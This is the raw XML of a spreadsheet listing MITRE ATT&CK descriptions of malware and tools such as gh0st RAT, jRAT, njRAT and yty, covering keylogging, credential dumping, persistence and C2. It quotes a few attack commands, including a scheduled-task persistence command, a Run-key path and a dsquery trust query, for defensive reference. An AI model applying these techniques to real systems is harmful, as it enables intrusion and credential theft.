    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to AES encrypt C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the system volume information of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the MAC address of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on user accounts within a domain.(Citation: TechNet Dsquery)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on permission groups within a domain.(Citation: TechNet Dsquery)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on domain trusts with &lt;code&gt;dsquery * -filter "(objectClass=trustedDomain)" -attr *&lt;/code&gt;.(Citation: Harmj0y Domain Trusts)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files to/from a given URL.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files to/from a remote share.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can use Volume Shadow Copy to copy locked files such as ntds.dit.(Citation: LOLBAS Esentutl)(Citation: Cary Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to read and write alternate data streams.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to wipe event logs.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to open a remote shell to execute commands.(Citation: FireEye Hacking Team)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used DLL side-loading.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has decrypted and loaded the [gh0st RAT](https://attack.mitre.org/software/S0032) DLL into memory, once the initial dropper executable is launched.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has encrypted TCP communications to evade detection.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to to delete files.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can download files to the victim’s machine.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has a keylogger.(Citation: Alintanahin 2014)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has altered the InstallTime subkey.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used the InterlockedExchange, SeShutdownPrivilege, and ExitWindowsEx Windows API functions.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used an encrypted protocol within TCP segments to communicate with the C2.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to list processes.(Citation: FireEye Hacking Team)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can inject malicious code into process created by the “Command_Create&amp;Inject” function.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has checked for the existence of a Service key to determine if it has already been installed on the system.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has added a Registry Run key to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used rundll32 for execution.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can capture the victim’s screen remotely.(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can execute its service if the Service key exists. If the key does not exist, [gh0st RAT](https://attack.mitre.org/software/S0032) will create and run the service.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can load DLLs into memory.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used Zlib to compress C2 communications data before encrypting it.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) uses RC4 and XOR to encrypt C2 traffic.(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has gathered system architecture, processor, OS configuration, and installed hardware information.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can create a new service to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump LSA secrets.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump Windows password hashes from the SAM.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) provides command-line access to the compromised system.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) installs itself as a service for persistence.(Citation: Dell Lateral Movement)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) encrypts C2 content with XOR using a single byte, 0x12.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) opens cmd.exe on the victim.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will zip up the /Library/Keychains directory before exfiltrating it.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) prompts the user for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) saves itself with a leading "." so that it's hidden from users by default.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) collects the keychains on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) lists the current processes running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) adds an entry to the rc.common file for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will look for the current IP address.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture microphone recordings.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture clipboard data.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has a function to delete files from the victim’s machine.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can browse file systems.(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can download and execute files.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with JScript.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to log keystrokes from the victim’s machine, both offline and online.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283)’s Java payload is encrypted with AES.(Citation: jRAT Symantec Aug 2018) Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of [jRAT](https://attack.mitre.org/software/S0283) also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can map UPnP ports.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can steal keys for VPNs and cryptocurrency wallets.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can query and kill system processes.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can serve as a SOCKS proxy server.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can support RDP control.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can be configured to reconnect at certain intervals.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to take screenshots of the victim’s machine.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) payloads have been packed.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list and manage startup entries.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can gather victim internal and external IPs.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list network connections.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list local services.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to capture video from a webcam.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with VBScript.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has command line access.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended destination.</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover local NetBIOS domain names.</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover current NetBIOS sessions.</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to disable local firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to set up a proxy tunnel to allow remote host access to an infected host.(Citation: Securelist fileless attacks Feb 2017)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to discover system firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) can be used to enumerate local network connections, including active TCP connections and other network statistics.(Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) gathers information about opened windows during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used AutoIt to compile the payload and main script into a single executable after delivery.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module that steals passwords saved in victim web browsers.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can collect data from a local system.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has modified the Windows firewall to allow itself to communicate through the firewall.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used HTTP to receive stolen information from the infected machine.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used a fast flux DNS for C2 IP resolution.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can browse file systems using a file manager module.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of deleting objects related to itself (registry keys, files, and firewall rules) on the victim.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can download files to the victim’s machine.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of logging keystrokes.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can create, delete, or modify a specified Registry key or value.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used the ShellExecute() function within a script.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used port 1177 for HTTP C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has included a base64 encoded executable.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) will attempt to detect if the victim system has a camera during the initial infection. [njRAT](https://attack.mitre.org/software/S0385) can also detect any removable drives connected to the system.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has executed PowerShell commands via auto-run registry key persistence.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can search a list of running processes for Tr.exe.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can read specific registry values.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has added persistence via the Registry key &lt;code&gt;HKCU\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; and dropped a shortcut in &lt;code&gt;%STARTUP%&lt;/code&gt;.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module for performing remote desktop access.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can identify remote hosts on connected networks.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can be configured to spread via removable drives.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can capture screenshots of the victim’s machines.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) uses Base64 encoding for C2 traffic.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the victim operating system and computer name during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the current user during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can access the victim's webcam.(Citation: Fidelis njRAT June 2013)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used HTTP for C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can launch a command shell interface for executing commands.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>If an initial connectivity check fails, [pngdowner](https://attack.mitre.org/software/S0067) attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) deletes content from C2 communications that was saved to the user's temporary directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) can be used to dump credentials from the SAM.(Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to discover routing configuration information.</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule tasks on a Windows system to run at a specific date and time.(Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is used to enumerate and dump information from Microsoft SharePoint.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) can be used to automate exploitation of SQL injection vulnerabilities.(Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) can be used to execute binaries on remote systems by creating and starting a service.(Citation: xCmd)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) communicates to the C2 server by retrieving a Google Doc.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) contains junk code in its binary, likely to confuse malware analysts.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers information on victim’s drives and has a plugin for document listing.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses a keylogger plugin to gather keystrokes.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gets an output of running processes using the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses the &lt;code&gt;net view&lt;/code&gt; command for discovery.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) establishes persistence by creating a scheduled task with the command &lt;code&gt;SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects screenshots of the victim machine.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) packs a plugin with UPX.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command &lt;code&gt;systeminfo&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) runs &lt;code&gt;ipconfig /all&lt;/code&gt; and collects the domain name.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects the victim’s username.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has deleted itself after creating a service as well as deleted a temporary file when the system reboots.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can browse the file system.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can modify the Registry.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used RDP for lateral movement.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has been copied over network shares to move laterally.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used SchTasks for execution.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim PC name and OS version.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim IP address.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the name of the logged-in user on the victim.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can launch command-line shells.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has established persistence by adding itself as a new service.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>Buchstaben</t>
  </si>
  <si>
    <t>Zahlen</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>B</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</si>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</sst>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u/>
      <sz val="12"/>
      <color theme="10"/>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2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>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attack.mitre.org/software/S0363" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0048" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0128" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0030" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0037" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0055" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0217" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0499" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0233" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0442" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0138" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0068" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0043" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0154" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0173" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0565" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0464" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0073" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0189" TargetMode="External"/><Relationship Id="rId237" 